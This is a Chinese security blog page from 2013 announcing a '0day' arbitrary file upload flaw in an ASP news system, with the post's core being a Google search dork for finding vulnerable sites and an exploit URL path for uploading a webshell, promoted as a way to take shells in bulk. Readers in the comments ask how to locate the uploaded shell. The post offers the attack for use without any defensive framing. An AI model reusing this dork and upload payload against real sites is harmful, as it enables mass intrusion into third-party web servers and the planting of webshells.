阿峰博客阿峰'S blog

EvilURL v2.0一个生成用于钓鱼攻击的IDN域名的工具

分析Cknife,一个类似China Chopper的webshell管理工具（第二部分）

我是如何打造一款自动化SQL注入工具的

国产“一句话”管理工具：开山斧

内网渗透之域渗透02-域中的信息收集

CryKeX：Linux内存加密密钥提取工具

Joy：一款用于捕获和分析网络内部流量数据的工具

One-Lin3r：懒人的福音，渗透测试单行化工具

刷新换一批

关注我们

QRcode

QRcode

安全意识小Tips：1.在处理快递单、各种账单和交通票据时，最好先涂抹掉个人信息部分再丢弃，或者集中起来定时统一销毁。
安全意识小Tips：2.避免连接公共网络，如果非要上网，下线时一定要注销登录，并清理痕迹。
安全意识小Tips：3.在上网评论朋友微博、日志、图片时，不要随意留下朋友的个人信息，更不要故意公布他人的个人信息。
安全意识小Tips：4.在网络上留电话号码，数字之间可以用"-"隔开，避免被搜索引擎搜到。
安全意识小Tips：5.不在微信、微博等晒地点、晒自拍照，还有父母喜欢晒孩子照片等。一方面暴露了个人隐私，另一方面可能招致犯罪。
安全意识小Tips：6.自己的重要资料或数据尽量不要同步公有云上，如百度云，iCloud等，重要资料应尽量存放至本地磁盘或私有云中。

主页 » 信息安全 » 正文

任意文件上传漏洞可批量拿shell

feng 2013-01-29 7,781 ℃ 3条点评

今天呢，发布一个0day，是一个任意上传漏洞。

谷歌关键字：inurl:newslist.asp?NodeCode=
然后在域名后面添加admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

任意上传拿shell

很吃香哦

出图测试

本文标签：上传漏洞

版权信息

永久链接：http://www.afeng.org/556.html
转载请注明转自 » 阿峰博客阿峰'S blog » 任意文件上传漏洞可批量拿shell

已有3条评论，欢迎点评！

#2 Sh1Ft2b
请问怎么找马地址我的博客
2013-03-16 下午 4:11回复
- feng @ Sh1Ft2b
  抓包
  2013-03-17 下午 8:16回复
#1 阿樂
上传成功后的文件地址是什么？
2017-01-06 上午 4:35回复